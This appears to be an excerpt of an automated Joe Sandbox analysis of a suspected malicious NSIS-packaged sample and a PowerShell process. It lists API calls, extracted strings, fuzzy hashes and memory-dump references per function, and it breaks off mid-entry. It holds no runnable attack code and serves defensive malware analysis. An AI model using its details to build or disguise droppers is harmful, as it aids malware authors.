Snapshot File: hcaresult_7_2_7ff848cf0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bbc4313f27da2690c1ab369b90788066ad3c72958c7635aa30b412a34d75ae63
Instruction ID: a4b1bed344bb7a3804d4c4e8f33fe8d64add9940403db90230de6e982e148be4
Opcode Fuzzy Hash: bbc4313f27da2690c1ab369b90788066ad3c72958c7635aa30b412a34d75ae63
Instruction Fuzzy Hash: 7931E77091CB488FDB1C9B5C9C066A97BE0FB59321F00421FE449C3692DB74A856CBD6

Function 00007FF848CF65B8 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2247238733.00007FF848CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff848cf0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79eeb86ba559ccaf9372f54eee28eccc91989052d2468d067513829f184ee97a
Instruction ID: 28a370e92969532a9f020afcab408596b4b612d5b68ffea2b1fd889e8dd6f4f8
Opcode Fuzzy Hash: 79eeb86ba559ccaf9372f54eee28eccc91989052d2468d067513829f184ee97a
Instruction Fuzzy Hash: 0521293090CB4C4FEB58DFAC984ABE97BE0EB95321F04416BD049C3196DA74945ACB91

Function 00007FF848CF3475 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2247238733.00007FF848CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff848cf0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
Instruction ID: f0cbffddd1350f1989245c5617594b757cf435c16a4d6f69193bed4aae19a3f6
Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
Instruction Fuzzy Hash: 1601677111CB0C4FD744EF0CE451AA5B7E0FB95364F10056EE58AC3691D736E881CB45

Function 00007FF848CF63F3 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2247238733.00007FF848CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff848cf0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb0f65730c0086f40d06a0dde2458d509d383c45e82c4689f4cec7f3746f3909
Instruction ID: 45545a4a1e62f39f4bdf6422beda730fd7c903f7299951575dc073b9065b6a2f
Opcode Fuzzy Hash: fb0f65730c0086f40d06a0dde2458d509d383c45e82c4689f4cec7f3746f3909
Instruction Fuzzy Hash: 42F0AF7290C9888FD785FF2CE8A64E97BE0FF15205F1841BAE14C860A3DB219844C7C9

Analysis Process: downloaded_exe.exePID: 7724, Parent PID: 384COMMON

Execution Graph

Execution Coverage:	17.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	16.4%
Total number of Nodes:	1482
Total number of Limit Nodes:	26

Executed Functions

Function 004050F9 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 295
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 0040515B
GetDlgItem.USER32(?,000003EE), ref: 0040516A
GetClientRect.USER32(?,?), ref: 004051C2
GetSystemMetrics.USER32(00000015), ref: 004051CA
SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
ShowWindow.USER32(?,00000008), ref: 00405266
GetDlgItem.USER32(?,000003EC), ref: 00405287
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
GetDlgItem.USER32(?,000003F8), ref: 00405179

Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00425979,759223A0,00000000), ref: 00406902

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

GetDlgItem.USER32(?,000003EC), ref: 004052D7
CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
CloseHandle.KERNELBASE(00000000), ref: 004052EC
ShowWindow.USER32(00000000), ref: 00405313
ShowWindow.USER32(?,00000008), ref: 00405318
ShowWindow.USER32(00000008), ref: 0040535F
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
CreatePopupMenu.USER32 ref: 004053A2
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
GetWindowRect.USER32(?,?), ref: 004053CA
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
OpenClipboard.USER32(00000000), ref: 00405437
EmptyClipboard.USER32 ref: 0040543D
GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
GlobalLock.KERNEL32(00000000), ref: 00405453
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
GlobalUnlock.KERNEL32(00000000), ref: 00405489
SetClipboardData.USER32(0000000D,00000000), ref: 00405494
CloseClipboard.USER32 ref: 0040549A

Strings

{, xrefs: 0040537E
New install of "%s" to "%s", xrefs: 004051AE

Memory Dump Source

Source File: 00000009.00000002.2330171067.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2330152790.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330199744.0000000000409000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000040C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.0000000000420000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.0000000000434000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000046B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000049F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330372487.0000000000500000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_downloaded_exe.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
String ID: New install of "%s" to "%s"${
API String ID: 2110491804-1641061399
Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58

Function 004038AF Relevance: 52.8, APIs: 22, Strings: 8, Instructions: 304
filestringcomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#17.COMCTL32 ref: 004038CE
SetErrorMode.KERNELBASE(00008001), ref: 004038D9
OleInitialize.OLE32(00000000), ref: 004038E0

Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353

SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
CoUninitialize.COMBASE(?), ref: 00403AFD
ExitProcess.KERNEL32 ref: 00403B1D
lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C

Strings

NSIS Error, xrefs: 0040390E
/D=, xrefs: 004039D2
SeShutdownPrivilege, xrefs: 00403C42
~nsu.tmp, xrefs: 00403B23
_?=, xrefs: 00403A90
\Temp, xrefs: 00403A47
Error launching installer, xrefs: 00403AA9
NCRC, xrefs: 004039A8

Memory Dump Source

Source File: 00000009.00000002.2330171067.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2330152790.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330199744.0000000000409000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000040C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.0000000000420000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.0000000000434000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000046B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000049F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330372487.0000000000500000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_downloaded_exe.jbxd

Similarity

API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
API String ID: 2435955865-3712954417
Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE

Function 00406301 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
FindClose.KERNEL32(00000000), ref: 00406318

Strings

jF, xrefs: 00406302

Memory Dump Source

Source File: 00000009.00000002.2330171067.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2330152790.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330199744.0000000000409000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000040C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.0000000000420000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.0000000000434000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000046B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000049F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330372487.0000000000500000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_downloaded_exe.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: jF
API String ID: 2295610775-3349280890
Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED

Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351
sleepfilewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostQuitMessage.USER32(00000000), ref: 00401648
Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
SetForegroundWindow.USER32(?), ref: 004016CB
ShowWindow.USER32(?), ref: 00401753
ShowWindow.USER32(?), ref: 00401767
SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
MoveFileW.KERNEL32(00000000,?), ref: 00401908
GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE

Strings

CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
Rename on reboot: %s, xrefs: 00401943
Rename failed: %s, xrefs: 0040194B
CreateDirectory: "%s" (%d), xrefs: 004017BF
SetFileAttributes failed., xrefs: 004017A1
SetFileAttributes: "%s":%08X, xrefs: 0040177B
IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
Rename: %s, xrefs: 004018F8
detailprint: %s, xrefs: 00401679
Sleep(%d), xrefs: 0040169D
IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
Jump: %d, xrefs: 00401602
CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
BringToFront, xrefs: 004016BD
Call: %d, xrefs: 0040165A
Aborting: "%s", xrefs: 0040161D
CreateDirectory: "%s" created, xrefs: 00401849

Memory Dump Source

Source File: 00000009.00000002.2330171067.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2330152790.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330199744.0000000000409000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000040C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.0000000000420000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.0000000000434000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000046B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000049F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330372487.0000000000500000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_downloaded_exe.jbxd

Similarity

API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
API String ID: 2872004960-3619442763
Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D

Function 004054A5 Relevance: 48.3, APIs: 32, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
ShowWindow.USER32(?), ref: 004054FE
DestroyWindow.USER32 ref: 00405512
SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
GetDlgItem.USER32(?,?), ref: 0040554F
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
IsWindowEnabled.USER32(00000000), ref: 0040556A
GetDlgItem.USER32(?,00000001), ref: 00405619
GetDlgItem.USER32(?,00000002), ref: 00405623
SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
GetDlgItem.USER32(?,00000003), ref: 00405734
ShowWindow.USER32(00000000,?), ref: 00405756
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
EnableWindow.USER32(?,?), ref: 00405783
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
EnableMenuItem.USER32(00000000), ref: 004057A0
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
SetWindowTextW.USER32(?,00451D98), ref: 00405808
ShowWindow.USER32(?,0000000A), ref: 0040593C

Memory Dump Source

Source File: 00000009.00000002.2330171067.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2330152790.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330199744.0000000000409000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000040C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.0000000000420000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.0000000000434000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000046B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000049F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330372487.0000000000500000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_downloaded_exe.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 3282139019-0
Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E

Function 00405958 Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353

lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A

Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A

LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
RegisterClassW.USER32(00476A40), ref: 00405B36
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87

Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C

ShowWindow.USER32(00000005,00000000), ref: 00405BBD
LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
RegisterClassW.USER32(00476A40), ref: 00405BFF
DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E

Strings

.DEFAULT\Control Panel\International, xrefs: 004059C5
@jG, xrefs: 00405AF2
RichEdit20A, xrefs: 00405BE2, 00405BE7
Control Panel\Desktop\ResourceLocale, xrefs: 0040599E
F, xrefs: 00405A22
"F, xrefs: 00405A4B
RichEdit, xrefs: 00405BF0
RichEd32, xrefs: 00405BD4
RichEd20, xrefs: 00405BC9
_Nb, xrefs: 00405AFD
.exe, xrefs: 00405A69

Memory Dump Source

Source File: 00000009.00000002.2330171067.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2330152790.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330199744.0000000000409000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000040C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.0000000000420000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.0000000000434000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000046B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000049F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330372487.0000000000500000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_downloaded_exe.jbxd

Similarity

API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 608394941-2746725676
Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D

Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

lstrcatW.KERNEL32(00000000,00000000,SyndicateMapHappensAttractionSexually,004D70B0,00000000,00000000), ref: 00401A76
CompareFileTime.KERNEL32(-00000014,?,SyndicateMapHappensAttractionSexually,SyndicateMapHappensAttractionSexually,00000000,00000000,SyndicateMapHappensAttractionSexually,004D70B0,00000000,00000000), ref: 00401AA0

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00425979,759223A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00425979,759223A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00425979,759223A0,00000000), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Strings

File: overwriteflag=%d, allowskipfilesflag=%d, name="%s", xrefs: 00401A39
File: error, user abort, xrefs: 00401B53
File: error, user cancel, xrefs: 00401B93
File: error, user retry, xrefs: 00401B40
File: skipped: "%s" (overwriteflag=%d), xrefs: 00401B81
File: wrote %d to "%s", xrefs: 00401BD0
SyndicateMapHappensAttractionSexually, xrefs: 00401A53, 00401A5C, 00401A69, 00401A8C, 00401AC2, 00401AD8, 00401AEF, 00401B07, 00401B5E, 00401B80, 00401BCE, 00401C10, 00401C19, 00401C23, 00401C29, 00401C3B
File: error creating "%s", xrefs: 00401AF0

Memory Dump Source

Source File: 00000009.00000002.2330171067.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2330152790.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330199744.0000000000409000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000040C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.0000000000420000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.0000000000434000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000046B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000049F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330372487.0000000000500000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_downloaded_exe.jbxd

Similarity

API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$SyndicateMapHappensAttractionSexually
API String ID: 4286501637-1424157630
Opcode ID: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
